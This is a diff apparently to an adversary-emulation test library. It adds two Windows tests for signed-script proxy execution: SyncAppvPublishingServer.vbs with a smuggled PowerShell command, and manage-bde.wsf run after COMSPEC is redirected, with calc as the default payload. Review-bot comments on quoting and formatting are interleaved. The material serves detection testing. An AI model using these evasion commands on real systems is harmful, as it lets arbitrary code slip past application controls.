diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 5e8bd42a..8df9785f 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -10,6 +10,10 @@ There are several other signed scripts that may be used in a similar manner. (Ci
- [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
+- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution)
+
+- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution)
+
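Review bot: The test name "SyncAppvPublishingServe" in the two new list entries (and in their anchors) looks like a truncated script name; please verify against the actual file in System32 before it propagates into every index, since the same spelling is used for the command path later in this patch. Also, the two added entries are separated by blank lines (the `+` lines after each bullet) while the existing Atomic Test #1 entry has none, which will break the list rendering; drop the empty lines so all three bullets form one list.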
@@ -31,4 +35,55 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local
+
+
+
+## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution
+Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command_to_execute | A PowerShell command to execute. | string | Start-Process calc|
+
+#### Run it with `command_prompt`!
+```
+C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+```
+
+
+
+
+
+
+## Atomic Test #3 - manage-bde.wsf Signed Script Command Execution
+Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe|
+
+#### Run it with `command_prompt`!
+```
+set comspec=#{command_to_execute}
+cscript manage-bde.wsf
+```
+
+#### Commands to Check Prerequisites:
+```
+
+```
+
+#### Cleanup Commands:
+```
+set comspec=C:\Windows\System32\cmd.exe
+```
+
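Review bot: The Test #2 command uses typographic quotes (`“\n;#{command_to_execute}”`) around the argument; cmd.exe does not treat these as quotes, so the argument will not be delimited as intended. Replace them with ASCII `"` and confirm the `\n` is meant to be passed literally, since the command prompt has no newline escape. For consistency with Test #1 (`cscript.exe /b ...`) and Test #3 (`cscript manage-bde.wsf`), invoke the .vbs through `cscript.exe` rather than relying on the .vbs file association. In Test #3, the "Commands to Check Prerequisites" section is an empty fence and should either be removed or carry a real check; the cleanup hardcodes `C:\Windows\System32\cmd.exe`, which is wrong on hosts whose system drive is not C:, so prefer `%SystemRoot%\System32\cmd.exe` or restore the previously captured `%COMSPEC%` value.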
diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml
index 4de8acfa..dc422440 100644
--- a/atomics/T1216/T1216.yaml
+++ b/atomics/T1216/T1216.yaml
@@ -21,3 +21,45 @@ atomic_tests:
elevation_required: false
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
+
+- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+ description: |
+ Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ command_to_execute:
+ description: A PowerShell command to execute.
+ type: string
+ default: Start-Process calc
+
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+- name: manage-bde.wsf Signed Script Command Execution
+ description: |
+ Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ command_to_execute:
+ description: A command to execute.
+ type: Path
+ default: C:\Windows\System32\calc.exe
+
+ executor:
+ name: command_prompt
+ elevation_required: false
+ prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's
+ command: | # these are the actaul attack commands, at least one command must be provided
+ set comspec=#{command_to_execute}
+ cscript manage-bde.wsf
+ cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
+ set comspec=C:\Windows\System32\cmd.exe
\ No newline at end of file
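Review bot: The `prereq_command:` block for Test #3 is empty but still carries the template's inline comment, and the `command:` and `cleanup_command:` keys keep the scaffold comments too ("these are the actaul attack commands", "you can remove the cleanup_command section"); per the comment's own instruction, remove `prereq_command` entirely or give it a real check such as `if not exist %SystemRoot%\System32\manage-bde.wsf exit 1`, and strip the scaffold comments. The `type: Path` for `command_to_execute` conflicts with its description "A command to execute" since the value is assigned to `COMSPEC` and must be an executable path; make the description match. The Test #2 `command:` has the same typographic-quote problem as the markdown. Finally, add the missing trailing newline flagged by "No newline at end of file".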
diff --git a/atomics/index.md b/atomics/index.md
index e1b2e7c2..1f94994c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -363,6 +363,8 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+ - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+ - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1151 Space after Filename](./T1151/T1151.md)
- Atomic Test #1: Space After Filename [macos]
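Review bot: These index entries repeat the test names verbatim from T1216.yaml, so any rename of "SyncAppvPublishingServe" in the technique files must be carried into index.md, index.yaml and windows-index.md as well (each appears twice in this patch); if these indexes are generated from the YAML, regenerate them after the fix rather than hand-editing.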
@@ -747,6 +749,8 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+ - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+ - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- [T1153 Source](./T1153/T1153.md)
- Atomic Test #1: Execute Script using Source [macos, linux]
- Atomic Test #2: Execute Script using Source Alias [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 116f896d..8b5eb01f 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -10664,6 +10664,44 @@ defense-evasion:
localhost "script:#{remote_payload}"
'
+ - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+ description: 'Executes the signed SyncAppvPublishingServe script with options
+ to execute an arbitrary PowerShell command.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_to_execute:
+ description: A PowerShell command to execute.
+ type: string
+ default: Start-Process calc
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+'
+ - name: manage-bde.wsf Signed Script Command Execution
+ description: 'Executes the signed manage-bde.wsf script with options to execute
+ an arbitrary command.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_to_execute:
+ description: A command to execute.
+ type: Path
+ default: C:\Windows\System32\calc.exe
+ executor:
+ name: command_prompt
+ elevation_required: false
+ prereq_command: ''
+ command: |
+ set comspec=#{command_to_execute}
+ cscript manage-bde.wsf
+ cleanup_command: set comspec=C:\Windows\System32\cmd.exe
T1151:
technique:
x_mitre_data_sources:
@@ -21091,6 +21129,44 @@ execution:
localhost "script:#{remote_payload}"
'
+ - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+ description: 'Executes the signed SyncAppvPublishingServe script with options
+ to execute an arbitrary PowerShell command.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_to_execute:
+ description: A PowerShell command to execute.
+ type: string
+ default: Start-Process calc
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+'
+ - name: manage-bde.wsf Signed Script Command Execution
+ description: 'Executes the signed manage-bde.wsf script with options to execute
+ an arbitrary command.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_to_execute:
+ description: A command to execute.
+ type: Path
+ default: C:\Windows\System32\calc.exe
+ executor:
+ name: command_prompt
+ elevation_required: false
+ prereq_command: ''
+ command: |
+ set comspec=#{command_to_execute}
+ cscript manage-bde.wsf
+ cleanup_command: set comspec=C:\Windows\System32\cmd.exe
T1153:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a4a50715..2182952e 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -151,6 +151,8 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+ - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+ - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1099 Timestomp](./T1099/T1099.md)
@@ -609,6 +611,8 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+ - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+ - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]